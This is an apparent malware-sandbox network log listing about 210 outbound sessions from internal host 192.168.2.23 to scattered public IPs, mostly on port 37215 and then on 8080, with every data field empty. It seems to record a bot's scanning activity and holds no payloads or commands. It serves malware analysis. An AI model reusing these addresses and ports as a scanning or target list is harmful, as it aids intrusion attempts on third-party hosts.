                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11945192.168.2.235935641.35.209.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11946192.168.2.2339958157.77.159.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11947192.168.2.2349562157.59.157.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11948192.168.2.2349714122.224.71.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11949192.168.2.234775441.174.177.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11950192.168.2.235501041.130.77.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11951192.168.2.235734841.109.193.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11952192.168.2.233340841.81.18.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11953192.168.2.234667041.117.239.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11954192.168.2.2345476157.107.164.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11955192.168.2.2352472219.226.160.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11956192.168.2.2353972197.238.181.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11957192.168.2.234356888.17.231.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11958192.168.2.233764841.255.57.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11959192.168.2.2335370197.169.100.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11960192.168.2.234347041.161.255.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11961192.168.2.2352422157.88.195.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11962192.168.2.234306641.109.176.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11963192.168.2.2342970197.145.18.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11964192.168.2.2353388157.209.3.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11965192.168.2.2349540197.49.30.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11966192.168.2.2349124197.42.233.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11967192.168.2.235522041.119.27.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11968192.168.2.233848641.181.210.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11969192.168.2.234398041.223.252.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11970192.168.2.234328684.64.180.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11971192.168.2.2340600197.145.128.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11972192.168.2.2354142107.170.15.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11973192.168.2.2358938211.98.71.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11974192.168.2.2335494197.169.7.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11975192.168.2.2351022158.102.245.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11976192.168.2.233293241.56.41.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11977192.168.2.2344918157.230.52.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11978192.168.2.233828641.113.188.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11979192.168.2.2351916157.176.170.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11980192.168.2.233611641.160.233.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11981192.168.2.2351782157.173.8.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11982192.168.2.2345932197.172.24.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11983192.168.2.2352128157.160.205.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11984192.168.2.2335966167.92.223.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11985192.168.2.2337852221.108.185.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11986192.168.2.2352274157.4.6.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11987192.168.2.235319041.74.16.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11988192.168.2.2357444179.157.136.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11989192.168.2.2357084157.231.215.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11990192.168.2.2333934197.223.120.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11991192.168.2.234995441.151.24.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11992192.168.2.233683641.19.109.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11993192.168.2.233682841.217.98.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11994192.168.2.234748441.213.216.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11995192.168.2.234703041.84.1.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11996192.168.2.2337962124.232.162.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11997192.168.2.2334560157.170.175.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11998192.168.2.234488641.98.146.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11999192.168.2.234581686.28.57.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12000192.168.2.233428641.163.7.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12001192.168.2.2340082157.14.104.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12002192.168.2.2351080197.78.205.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12003192.168.2.2356068175.49.151.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12004192.168.2.2346928153.67.49.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12005192.168.2.236053841.28.26.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12006192.168.2.2352598192.234.145.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12007192.168.2.2343778129.218.183.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12008192.168.2.2337722157.73.139.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12009192.168.2.233770241.172.68.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12010192.168.2.2341552157.214.205.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12011192.168.2.234566441.228.96.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12012192.168.2.235589836.251.130.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12013192.168.2.2343936197.43.237.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12014192.168.2.233507674.36.175.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12015192.168.2.2351678211.38.19.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12016192.168.2.2349874197.142.4.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12017192.168.2.234664041.13.37.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12018192.168.2.2358892157.90.65.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12019192.168.2.2335080197.189.228.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12020192.168.2.235977435.34.57.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12021192.168.2.234764299.13.242.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12022192.168.2.234412881.0.20.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12023192.168.2.2335744186.60.6.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12024192.168.2.2342162112.176.96.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12025192.168.2.235953239.96.71.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12026192.168.2.235950835.14.109.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12027192.168.2.233362299.115.2.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12028192.168.2.235586053.51.223.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12029192.168.2.2352694132.247.209.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12030192.168.2.23333004.225.63.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12031192.168.2.235335483.3.182.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12032192.168.2.233928499.230.40.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12033192.168.2.2355878105.211.196.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12034192.168.2.2338894109.30.82.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12035192.168.2.2333234136.83.129.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12036192.168.2.2360584137.66.235.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12037192.168.2.2341652121.163.41.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12038192.168.2.234000071.64.61.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12039192.168.2.233592823.120.114.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12040192.168.2.233952491.121.52.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12041192.168.2.235836250.141.20.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12042192.168.2.2338134100.139.33.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12043192.168.2.2342868170.12.226.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12044192.168.2.2344570106.24.88.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12045192.168.2.2356288132.160.65.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12046192.168.2.2349412191.22.229.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12047192.168.2.2359418158.202.224.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12048192.168.2.2355956129.41.73.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12049192.168.2.2332982144.138.71.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12050192.168.2.2349728186.209.13.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12051192.168.2.235236846.193.237.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12052192.168.2.2341634128.85.98.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12053192.168.2.234821618.133.103.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12054192.168.2.2356804163.238.248.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12055192.168.2.234104219.234.196.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12056192.168.2.2338750151.60.190.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12057192.168.2.2351094124.30.213.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12058192.168.2.235732689.78.89.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12059192.168.2.234996859.112.121.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12060192.168.2.234885892.94.193.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12061192.168.2.2353534158.29.3.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12062192.168.2.235593012.102.174.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12063192.168.2.2359022154.102.127.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12064192.168.2.235498489.142.54.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12065192.168.2.233919849.86.86.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12066192.168.2.236079493.124.152.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12067192.168.2.235308040.40.151.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12068192.168.2.235195449.173.124.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12069192.168.2.2354724101.198.22.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12070192.168.2.2338242115.255.76.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12071192.168.2.233959681.167.76.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12072192.168.2.2347536195.179.183.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12073192.168.2.2353382170.48.192.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12074192.168.2.235009885.165.143.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12075192.168.2.2345740137.25.236.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12076192.168.2.23546748.190.130.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12077192.168.2.2352692185.84.133.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12078192.168.2.2334600100.223.188.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12079192.168.2.2343242121.15.112.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12080192.168.2.2335602190.2.90.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12081192.168.2.2360724100.61.157.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12082192.168.2.2357898117.44.215.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12083192.168.2.233531444.92.111.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12084192.168.2.2347454156.188.211.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12085192.168.2.2343730133.250.43.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12086192.168.2.234674614.71.199.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12087192.168.2.234916673.46.18.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12088192.168.2.2353598217.178.236.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12089192.168.2.2338200180.162.191.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12090192.168.2.2342684151.232.129.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12091192.168.2.235434058.196.1.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12092192.168.2.2357396138.167.190.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12093192.168.2.23366549.30.173.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12094192.168.2.234246868.84.43.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12095192.168.2.233336841.195.148.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12096192.168.2.234357878.133.155.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12097192.168.2.2358318156.26.117.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12098192.168.2.2354258150.210.114.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12099192.168.2.2346336199.41.88.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12100192.168.2.2337256154.75.83.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12101192.168.2.2337082137.13.25.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12102192.168.2.2335708205.36.200.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12103192.168.2.235101660.232.201.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12104192.168.2.234951279.72.102.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12105192.168.2.2341594180.87.155.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12106192.168.2.2354738129.76.146.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12107192.168.2.2349692134.242.22.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12108192.168.2.233432677.241.234.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12109192.168.2.2333256202.14.153.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12110192.168.2.2347826141.73.253.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12111192.168.2.234098024.249.30.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12112192.168.2.234624623.111.7.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12113192.168.2.235541831.112.84.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12114192.168.2.2358802168.54.27.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12115192.168.2.234531678.3.216.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12116192.168.2.236090812.225.239.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12117192.168.2.2357092133.97.117.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12118192.168.2.2353534118.87.129.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12119192.168.2.2344336197.134.215.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12120192.168.2.234888827.108.250.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12121192.168.2.233864262.22.75.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12122192.168.2.2354826126.64.219.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12123192.168.2.2343126141.36.162.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12124192.168.2.234904037.70.199.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12125192.168.2.235623068.219.125.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12126192.168.2.234154464.138.126.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12127192.168.2.2341830147.224.1.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12128192.168.2.235636253.64.85.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12129192.168.2.234311418.183.241.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12130192.168.2.234890419.240.237.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12131192.168.2.2353500161.203.216.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12132192.168.2.2343636216.157.91.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12133192.168.2.233550235.184.50.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12134192.168.2.2345382141.8.117.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12135192.168.2.2338984165.14.22.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12136192.168.2.233423297.86.123.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12137192.168.2.234230097.158.237.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12138192.168.2.234652263.94.136.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12139192.168.2.2339282128.89.42.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12140192.168.2.233506018.205.206.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12141192.168.2.2347494216.46.125.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12142192.168.2.234496032.40.212.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12143192.168.2.234126065.252.233.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12144192.168.2.2357342155.74.237.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12145192.168.2.233615099.220.115.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12146192.168.2.2336812207.202.136.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12147192.168.2.2341500128.122.91.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12148192.168.2.2341160169.95.140.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12149192.168.2.2357488163.203.126.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12150192.168.2.2356150160.182.44.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12151192.168.2.2341350171.175.30.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12152192.168.2.234256699.78.31.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12153192.168.2.2347228124.232.2.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12154192.168.2.233803052.111.44.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
